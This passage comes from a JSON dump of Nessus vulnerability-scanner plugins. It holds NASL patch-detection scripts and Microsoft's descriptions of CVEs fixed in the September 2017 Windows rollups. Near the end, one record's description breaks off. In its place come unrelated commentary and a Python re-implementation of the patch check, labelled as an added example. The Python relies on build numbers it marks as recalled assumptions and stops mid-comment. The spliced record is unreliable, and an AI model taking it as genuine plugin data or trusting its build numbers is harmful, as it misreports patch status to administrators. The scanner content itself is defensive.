or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038792', '4038793');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038792, 4038793])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:59", "description": "The remote Windows host is missing security update 4038781.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. 
The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2017-8728, CVE-2017-8737)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8706, CVE-2017-8707,\n CVE-2017-8713)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-8687)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. 
(CVE-2017-8734)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. In a web-based attack scenario, an attacker could\n host a specially crafted website that is designed to\n exploit the vulnerability through Microsoft browsers and\n then convince a user to view the website. An attacker\n could also embed an ActiveX control marked "safe\n for initialization" in an application or Microsoft\n Office document that hosts the related rendering engine.\n The attacker could also take advantage of compromised\n websites, and websites that accept or host user-provided\n content or advertisements. These websites could contain\n specially crafted content that could exploit the\n vulnerability. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. 
(CVE-2017-8738,\n CVE-2017-8753, CVE-2017-8756)\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8720)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. 
For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. 
An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. Users whose accounts are\n configured to have fewer user rights on the system could\n be less impacted than users who operate with\n administrative user rights. (CVE-2017-8759)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. (CVE-2017-8677,\n CVE-2017-8681)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. 
An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-8675)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. 
An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2017-8702)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. If the current user is logged on with\n administrative user rights, an attacker could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8699)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. 
(CVE-2017-8529)", "edition": 20, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-03T00:00:00", "title": "KB4038781: Windows 10 September 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8681", "CVE-2017-8643", "CVE-2017-8713", "CVE-2017-8741", "CVE-2017-8757", "CVE-2017-8707", "CVE-2017-8695", "CVE-2017-8756", "CVE-2017-8682", "CVE-2017-0161", "CVE-2017-8719", "CVE-2017-8737", "CVE-2017-8699", "CVE-2017-8753", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8709", "CVE-2017-8683", "CVE-2017-8678", "CVE-2017-8628", "CVE-2017-8754", "CVE-2017-8735", "CVE-2017-8738", "CVE-2017-8728", "CVE-2017-8677", "CVE-2017-11766", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8679", "CVE-2017-8687", "CVE-2017-8734", "CVE-2017-8759", "CVE-2017-8676", "CVE-2017-8708", "CVE-2017-8688", "CVE-2017-8720", "CVE-2017-8692", "CVE-2017-8706", "CVE-2017-8702", "CVE-2017-8736", "CVE-2017-8529", "CVE-2017-8733", "CVE-2017-8675", "CVE-2017-8723"], "modified": "2017-11-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038781.NASL", "href": "https://www.tenable.com/plugins/nessus/104385", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104385);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/28\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8628\",\n \"CVE-2017-8643\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8702\",\n \"CVE-2017-8706\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8713\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8723\",\n \"CVE-2017-8728\",\n \"CVE-2017-8733\",\n \"CVE-2017-8734\",\n \"CVE-2017-8735\",\n \"CVE-2017-8736\",\n \"CVE-2017-8737\",\n \"CVE-2017-8738\",\n \"CVE-2017-8741\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\",\n \"CVE-2017-8753\",\n \"CVE-2017-8754\",\n \"CVE-2017-8756\",\n \"CVE-2017-8757\",\n \"CVE-2017-8759\",\n \"CVE-2017-11766\"\n );\n script_bugtraq_id(\n 98953,\n 100718,\n 100720,\n 100721,\n 100727,\n 100728,\n 100729,\n 100736,\n 100737,\n 100738,\n 100739,\n 100740,\n 100742,\n 100743,\n 100744,\n 100747,\n 100749,\n 100752,\n 100755,\n 100756,\n 100759,\n 100762,\n 100764,\n 100765,\n 100766,\n 100767,\n 100768,\n 100769,\n 100770,\n 100771,\n 100772,\n 100773,\n 100776,\n 100779,\n 100781,\n 100783,\n 100785,\n 100789,\n 100790,\n 100791,\n 100792,\n 100796,\n 100803,\n 100804\n );\n script_xref(name:\"MSKB\", value:\"4038781\");\n script_xref(name:\"MSFT\", value:\"MS17-4038781\");\n\n script_name(english:\"KB4038781: Windows 10 September 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by 
multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038781.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2017-8728, CVE-2017-8737)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8706, CVE-2017-8707,\n CVE-2017-8713)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the user's system. (CVE-2017-8683)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-8687)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-8734)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. In a web-based attack scenario, an attacker could\n host a specially crafted website that is designed to\n exploit the vulnerability through Microsoft browsers and\n then convince a user to view the website. An attacker\n could also embed an ActiveX control marked "safe\n for initialization" in an application or Microsoft\n Office document that hosts the related rendering engine.\n The attacker could also take advantage of compromised\n websites, and websites that accept or host user-provided\n content or advertisements. These websites could contain\n specially crafted content that could exploit the\n vulnerability. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-8738,\n CVE-2017-8753, CVE-2017-8756)\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8720)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. 
There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. 
(CVE-2017-11766)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. Users whose accounts are\n configured to have fewer user rights on the system could\n be less impacted than users who operate with\n administrative user rights. (CVE-2017-8759)\n\n - An information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the user's system. (CVE-2017-8677,\n CVE-2017-8681)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. 
An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-8675)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. 
An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2017-8702)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. If the current user is logged on with\n administrative user rights, an attacker could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8699)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. 
(CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038781/windows-10-update-kb4038781\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7c29dee1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4038781.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038781');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\nos_name = get_kb_item_or_exit(\"SMB/ProductName\");\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif(\"LTSB\" >!< os_name) audit(AUDIT_OS_NOT, \"Windows 10 version 1507 LTSB\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038781])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:59", "description": "The remote Windows host is missing security update 4038783.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. 
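The check at the end of the NASL source above reduces to a few host facts: the plugin applies only to OS build 10240 (and only when the product name contains LTSB), and it calls smb_check_rollup for the 09_2017 rollup rather than looking for the KB number in the installed-hotfix list. The following is an added example, not Tenable's code and not part of this page, that re-implements that decision offline in Python over constructed host records and generalizes it to the Version 1511 plugin (KB4038783) described next. The build-to-minimum-revision table is an assumption taken from Microsoft's release notes for the two KBs as recalled (KB4038781 = OS build 10240.17609, KB4038783 = 10586.1106), not from this page; verify it against the current release notes before relying on it. The Host record and the sample inventory are constructed input.

```python
"""Added example: offline re-implementation of the rollup decision made by the
Nessus plugins above. Not Tenable's code. Host records are constructed samples
standing in for what the plugin reads over SMB (ProductName, build, UBR and
the installed-hotfix list)."""
from __future__ import annotations

from dataclasses import dataclass, field

# ASSUMPTION: minimum update build revision (UBR) that contains each September
# 2017 rollup, from Microsoft's release notes as recalled, not from this page:
# KB4038781 = 10240.17609 (1507 LTSB), KB4038783 = 10586.1106 (1511).
SEP_2017_ROLLUPS = {
    "10240": ("KB4038781", 17609),
    "10586": ("KB4038783", 1106),
}


@dataclass
class Host:
    """Constructed stand-in for the ProductName, CurrentBuild and UBR registry facts."""
    name: str
    product_name: str
    build: str
    ubr: int
    hotfixes: set = field(default_factory=set)


def rollup_status(host: Host) -> tuple[str, str]:
    """Classify a host the way the plugin's audit()/hotfix_security_hole() paths do.

    Returns (verdict, reason) with verdict one of
    not_applicable, patched, missing, inconsistent.
    """
    if host.build not in SEP_2017_ROLLUPS:
        return "not_applicable", f"build {host.build} is not covered by these plugins"
    kb, min_ubr = SEP_2017_ROLLUPS[host.build]
    # The 1507 plugin bails out unless ProductName contains "LTSB": the non-LTSB
    # 1507 branch was out of support, so no September 2017 rollup exists for it.
    if host.build == "10240" and "LTSB" not in host.product_name:
        return "not_applicable", "Windows 10 1507 non-LTSB is not serviced"
    # Cumulative updates supersede each other, so the running revision is the
    # authoritative signal: a later rollup carries every fix in this one even
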